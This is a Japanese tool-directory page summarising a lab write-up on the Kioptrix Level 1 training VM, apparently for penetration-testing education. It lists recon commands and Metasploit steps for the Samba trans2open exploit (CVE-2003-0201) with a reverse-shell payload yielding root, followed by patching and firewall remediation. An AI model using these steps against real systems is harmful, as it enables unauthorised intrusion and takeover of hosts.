Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Kioptrix-Level1-Vulnerability-Analysis — Kioptrix Level 1 の技術監査。焦点: Samba 2.2.1a のエクスプロイト (CVE-2003-0201)、手動列挙、および内部インフラストラクチャの強化。 | Kitploit
ツール/GitHubGitHub/deepakkcybersec-eng/kioptrix-level1-vulnerability-analysis
特権昇格偵察脆弱性分析エクスプロイトネットワークセキュリティペネトレーションテスト学習と教育レッドチーミングラボと実践

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHubdeepakkcybersec-eng/kioptrix-level1-vulnerability-analysis

Kioptrix-Level1-Vulnerability-Analysis

Kioptrix Level 1 の技術監査。焦点: Samba 2.2.1a のエクスプロイト (CVE-2003-0201)、手動列挙、および内部インフラストラクチャの強化。

リポジトリを見る
8ヶ月前未レビュー

Kioptrix Level 1: フルスペクトラム脆弱性監査とエクスプロイト

🏛️ プロフェッショナル目的

目的は、Kioptrix Level 1環境に対して構造化されたペネトレーションテストを実施し、完全な'root'権限を奪取し、RedチームとBlueチームの両方の運用に適した技術的修復戦略を文書化することでした。

🏗️ 環境の再現(ハードウェアの背景)

最近の仮想化のデフォルト設定では、多くの場合、レガシーな2010年のカーネルで動作しません。このマシンを正常に起動しネットワークに接続するには、以下の特定のアーキテクチャ設定が必要でした。

  • OSサブタイプ: Linux / Red Hat (32-bit)。
  • ストレージアーキテクチャ: レガシーな.vmdkハードドライブをサポートするためにSATAからIDE Controllerに切り替え。
  • ネットワークプロトコル: Kali Linux攻撃マシンとの内部通信を可能にするため、Host-only adapterを使用したPCI FAST-IIIとして設定。

⚔️ 攻撃分析(Red Team パス)

エクスプロイトは、手動での列挙からエクスプロイトまでのライフサイクルに従いました。

1. 発見と偵察

  • Netdiscover: netdiscover -r 192.168.184.4 を使用してターゲットIPを特定。
  • Nmap スキャン: SSH (22)、 HTTP (80)、 RPC (111)、 NetBIOS-SSN (139) などのサービスを特定。 Samba 2.2.1aが主要なエントリポイントとしてフラグ付けされました。

2. エクスプロイト(Samba trans2open)

  • 脆弱性: CVE-2003-0201 (ヒープオーバーフロー)。
  • MITRE ATT&CK Mapping: - Tactic: 特権昇格 (TA0004)
    • Technique: 特権昇格のためのエクスプロイト (T1068)
  • Metasploit プロトコル:
    • use exploit/linux/samba/trans2open
    • set RHOSTS 192.168.114.5
    • set payload linux/x86/shell/reverse_tcp
  • 結果: リバースシェルが正常に起動。コマンド whoami が root を返しました。

🛡️ 防御的修復(Blue Team パス)

エンタープライズ環境を保護するには、以下の 脆弱性管理 (VM) 戦略が必須です。

  • パッチプロトコル: Samba を最新のサポートバージョン (Samba 4.x) にアップデート。 call_trans2open 関数の脆弱性は最新のバージョンで効果的に修正されています。
  • ネットワーク強化: ホストベースのファイアウォールを導入し、ポート139と445を信頼された内部サブネットのみに制限します。
  • VM ロール戦略: この修復は、標準的な業務時間中の脆弱性管理サイクルに該当し、インフラストラクチャの安定性を確保します。

📝 技術的証拠と手動ログ

以下の画像は、ライブでの手動列挙とターミナル実行を記録したものです。

ターゲット発見とアーキテクチャノート

手動ノート 1

Metasploit コマンドロジックとペイロード設定

手動ノート 2

ルートアクセス証明(ターミナルスナップショット)

ルートシェルの証拠

ツールをダウンロード